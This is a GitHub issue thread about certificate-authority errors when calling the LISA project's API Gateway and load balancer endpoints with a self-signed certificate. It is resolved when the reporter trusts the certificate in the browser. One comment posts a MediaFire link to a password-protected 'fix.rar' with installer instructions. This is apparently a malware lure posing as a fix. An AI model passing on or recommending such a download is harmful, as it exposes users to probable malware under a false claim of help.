### ISSUE TITLE
Cert Authority Invalid when interacting with api gateway endpoints 

### ISSUE THREAD

**Issue by david-saeger** [awslabs/LISA#53]
I deployed LISA as specified in the documentation and uploaded a self signed cert to interact with the load balancer and set its ARN under 

restApiConfig:loadBalancerConfig:sslCertIamArn

I am able to access the front end proxied through api-gateway but get net::ERR_CERT_AUTHORITY_INVALID on every elb endpoint request.

integration tests also fail but don't think that is helpful for diagnosing this issue. 
```

platform darwin -- Python 3.11.8+, pytest-8.3.2, pluggy-1.5.0 -- /Users/dsaeger/projects/LISA/.venv/bin/python3
cachedir: .pytest_cache
rootdir: /Users/dsaeger/projects/LISA
configfile: pyproject.toml
plugins: asyncio-0.23.2
asyncio: mode=Mode.STRICT

INTERNALERROR>   File "/Users/dsaeger/projects/LISA/.venv/lib/python3.11/site-packages/pytest_asyncio/plugin.py", line 612, in pytest_collectstart
INTERNALERROR>     pyobject = collector.obj
INTERNALERROR>                ^^^^^^^^^^^^^
INTERNALERROR> AttributeError: 'Package' object has no attribute 'obj'
```
Is there a suggested version of python to be using for testing this project?

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by petermuller** [comment]
I'm not sure what the file is but it shouldn't be necessary- the lambda running behind APIGW should be using the certificate ARN to grab the cert bundle and then make requests against it, which sounds like that is happening if proxied behind apigw

If this is happening just from the Chat UI, then please access your ALB directly so you can trust the cert in your browser

**Comment by david-saeger** [comment]
It was in fact through the chat-ui and as you noted adding my cert to my browser fixed the issue! thanks!

**Comment by petermuller** [comment]
Thanks for the followup! Glad it's working for you now!

Action for us:
* Documentation updates for known failure modes and solutions to them
